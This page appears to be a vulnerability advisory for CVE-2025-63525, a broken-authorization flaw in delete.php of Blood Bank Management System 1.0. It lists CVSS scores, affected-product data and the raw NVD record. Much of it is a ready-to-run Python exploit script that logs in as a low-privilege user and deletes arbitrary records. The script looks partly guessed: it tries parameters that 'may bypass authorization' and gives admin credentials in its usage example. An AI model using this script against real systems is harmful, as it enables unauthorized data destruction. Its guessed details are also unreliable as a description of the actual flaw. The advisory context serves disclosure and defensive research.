Security Vulnerability Report
中文
CVE-2025-63525 CVSS 9.6 CRITICAL

CVE-2025-63525

Published: 2025-12-01 15:15:51
Last Modified: 2026-01-06 21:15:43
Source: [email protected]

Description

An issue was discovered in Blood Bank Management System 1.0 allowing authenticated attackers to perform actions with escalated privileges via crafted request to delete.php.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Blood Bank Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63525 PoC - Blood Bank Management System 1.0 Privilege Escalation # Target: delete.php file with insufficient authorization check def exploit_cve_2025_63525(target_url, username, password, target_resource_id): """ Exploit for CVE-2025-63525: Privilege escalation via delete.php Args: target_url: Base URL of the vulnerable Blood Bank Management System username: Valid low-privilege account username password: Password for the account target_resource_id: ID of the resource to delete (can be any resource) Returns: bool: True if exploitation successful, False otherwise """ session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{target_url}/login.php" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print(f"[-] Login failed: HTTP {response.status_code}") return False print(f"[+] Successfully logged in as low-privilege user: {username}") # Step 2: Exploit the privilege escalation via delete.php delete_url = f"{target_url}/delete.php" # Craft malicious request to delete arbitrary resources delete_data = { 'id': target_resource_id, # Additional parameters that may bypass authorization 'action': 'delete', 'confirm': '1' } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } response = session.post(delete_url, data=delete_data, headers=headers, timeout=10) # Check if deletion was successful if response.status_code == 200: if 'success' in response.text.lower() or 'deleted' in response.text.lower(): print(f"[+] Privilege escalation successful!") print(f"[+] Resource ID {target_resource_id} deleted without proper authorization") return True print(f"[-] Exploitation may have failed. Check response manually.") print(f"[-] Response status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve_2025_63525_poc.py <target_url> <username> <password> <resource_id>") print("Example: python cve_2025_63525_poc.py http://localhost/bloodbank admin password 1") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] resource_id = sys.argv[4] print(f"[*] CVE-2025-63525 PoC - Blood Bank Management System 1.0") print(f"[*] Target: {target}") exploit_cve_2025_63525(target, user, pwd, resource_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63525", "sourceIdentifier": "[email protected]", "published": "2025-12-01T15:15:51.103", "lastModified": "2026-01-06T21:15:43.240", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Blood Bank Management System 1.0 allowing authenticated attackers to perform actions with escalated privileges via crafted request to delete.php."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"}]}]}], "references": [{"url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Shridharshukl/Blood-Bank-Management-System", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63525.md", "source": "[email protected]", "tags": ["Exploit"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.